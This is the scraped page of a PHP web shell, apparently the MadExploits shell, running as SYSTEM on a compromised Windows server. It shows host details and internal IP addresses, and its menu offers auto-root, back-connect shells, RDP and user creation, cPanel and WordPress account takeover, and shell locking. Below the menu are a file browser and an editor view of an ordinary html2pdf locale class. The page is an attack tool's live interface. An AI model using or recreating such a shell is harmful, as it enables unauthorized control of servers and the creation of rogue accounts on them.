Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
pdf /
_class /
[ HOME SHELL ]
Name
Size
Permission
Action
exception.class.php
4.71
KB
-rw-rw-rw-
locale.class - Copy.php
2.24
KB
-rw-rw-rw-
locale.class.php
2.24
KB
-rw-rw-rw-
myPdf.class.php
42.95
KB
-rw-rw-rw-
parsingCss.class.php
62.9
KB
-rw-rw-rw-
parsingHtml.class.php
17.3
KB
-rw-rw-rw-
tcpdfConfig.php
6.2
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : locale.class.php
<?php /** * HTML2PDF Librairy - HTML2PDF Locale * * HTML => PDF convertor * distributed under the LGPL License * * @author Laurent MINGUET <webmaster@html2pdf.fr> * @version 4.03 */ class HTML2PDF_locale { /** * code of the current used locale * @var string */ static protected $_code = null; /** * texts of the current used locale * @var array */ static protected $_list = array(); /** * directory where locale files are * @var string */ static protected $_directory = null; /** * load the locale * * @access public * @param string $code */ static public function load($code) { if (self::$_directory===null) { self::$_directory = dirname(dirname(__FILE__)).'/locale/'; } // must be in lower case $code = strtolower($code); // must be [a-z-0-9] if (!preg_match('/^([a-z0-9]+)$/isU', $code)) { throw new HTML2PDF_exception(0, 'invalid language code ['.self::$_code.']'); } // save the code self::$_code = $code; // get the name of the locale file $file = self::$_directory.self::$_code.'.csv'; // the file must exist if (!is_file($file)) { throw new HTML2PDF_exception(0, 'language code ['.self::$_code.'] unknown. You can create the translation file ['.$file.'] and send it to the webmaster of html2pdf in order to integrate it into a future release'); } // load the file self::$_list = array(); $handle = fopen($file, 'r'); while (!feof($handle)) { $line = fgetcsv($handle); if (is_countable($line)!=2) continue; self::$_list[trim($line[0])] = trim($line[1]); } fclose($handle); } /** * clean the locale * * @access public static */ static public function clean() { self::$_code = null; self::$_list = array(); } /** * get a text * * @access public static * @param string $key * @return string */ static public function get($key, $default='######') { return (isset(self::$_list[$key]) ? self::$_list[$key] : $default); } }
Close